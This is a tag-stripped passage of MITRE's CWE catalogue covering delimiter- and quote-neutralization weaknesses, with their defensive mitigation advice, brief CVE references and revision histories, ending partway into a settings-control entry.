+ + Parameter Delimiter + Failure to Sanitize Parameter/Argument Delimiters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as value delimiters when they are sent to a downstream component. + As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that value delimiters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2000-0293 + Multiple internal space, insufficient quoting - program does not use proper delimiter between values. + https://www.cve.org/CVERecord?id=CVE-2000-0293 + + + + + Value Delimiter + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Value Delimiter + Failure to Sanitize Value Delimiters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as record delimiters when they are sent to a downstream component. + As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that record delimiters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2004-1982 + Carriage returns in subject field allow adding new records to data file. + https://www.cve.org/CVERecord?id=CVE-2004-1982 + + + CVE-2001-0527 + Attacker inserts carriage returns and "|" field separator characters to add new user/privileges. + https://www.cve.org/CVERecord?id=CVE-2001-0527 + + + + + Record Delimiter + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Record Delimiter + Failure to Sanitize Record Delimiters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as line delimiters when they are sent to a downstream component. + As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. + + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that line delimiters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0267 + Linebreak in field of PHP script allows admin privileges when written to data file. + https://www.cve.org/CVERecord?id=CVE-2002-0267 + + + + + Line Delimiter + + + IDS03-J + Do not log unsanitized user input + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Line Delimiter + Failure to Sanitize Line Delimiters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as section delimiters when they are sent to a downstream component. + + As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. + One example of a section delimiter is the boundary string in a multipart MIME message. In many cases, doubled line delimiters can serve as a section delimiter. + + + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that section delimiters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Section Delimiter + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Section Delimiter + Failure to Sanitize Section Delimiters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as expression or command delimiters when they are sent to a downstream component. + As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Other + Execute Unauthorized Code or Commands + Alter Execution Logic + + + + + Developers should anticipate that inter-expression and inter-command delimiters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Delimiter between Expressions or Commands + + + SFP24 + Tainted input to command + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + A shell metacharacter (covered in CWE-150) is one example of a potential delimiter that may need to be neutralized. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2010-06-21 + updated Applicable_Platforms, Description, Relationship_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Delimiter between Expressions or Commands + Failure to Sanitize Expression/Command Delimiters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as input terminators when they are sent to a downstream component. + For example, a "." in SMTP signifies the end of mail message data, whereas a null character can be used for the end of a string. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that terminators will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2000-0319 + MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly in conjunction with off-by-one error. + https://www.cve.org/CVERecord?id=CVE-2000-0319 + + + CVE-2000-0320 + MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly in conjunction with off-by-one error. + https://www.cve.org/CVERecord?id=CVE-2000-0320 + + + CVE-2001-0996 + Mail server does not quote end-of-input terminator if it appears in the middle of a message. + https://www.cve.org/CVERecord?id=CVE-2001-0996 + + + CVE-2002-0001 + Improperly terminated comment or phrase allows commands. + https://www.cve.org/CVERecord?id=CVE-2002-0001 + + + + + Input Terminator + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Input Terminator + Failure to Remove Input Terminator + Failure to Sanitize Input Terminators + Improper Sanitization of Input Terminators + + + + The product does not properly handle when a leading character or sequence ("leader") is missing or malformed, or if multiple leaders are used when only one should be allowed. + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that leading characters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Input Leader + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Input Leader + Failure to Remove Input Leader + Failure to Sanitize Input Leaders + + + + Quotes injected into a product can be used to compromise a system. As data are parsed, an injected/absent/duplicate/malformed use of quotes may cause the process to take unexpected actions. + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that quotes will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2004-0956 + Database allows remote attackers to cause a denial of service (application crash) via a MATCH AGAINST query with an opening double quote but no closing double quote. + https://www.cve.org/CVERecord?id=CVE-2004-0956 + + + CVE-2003-1016 + MIE. MFV too? bypass AV/security with fields that should not be quoted, duplicate quotes, missing leading/trailing quotes. + https://www.cve.org/CVERecord?id=CVE-2003-1016 + + + + + Quoting Element + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Quoting Element + Failure to Remove Quoting Element + Failure to Sanitize Quoting Syntax + + + + One or more system settings or configuration elements can be externally controlled by a user. + Allowing external control of system settings can disrupt service or cause an application to behave in unexpected, and potentially malicious ways. + + + + + + + + + + + + Implementation + Setting manipulation vulnerabilities occur when an attacker can control values that govern the behavior of the system, manage specific resources, or in some way affect the functionality of the application. + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Varies by Context + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control 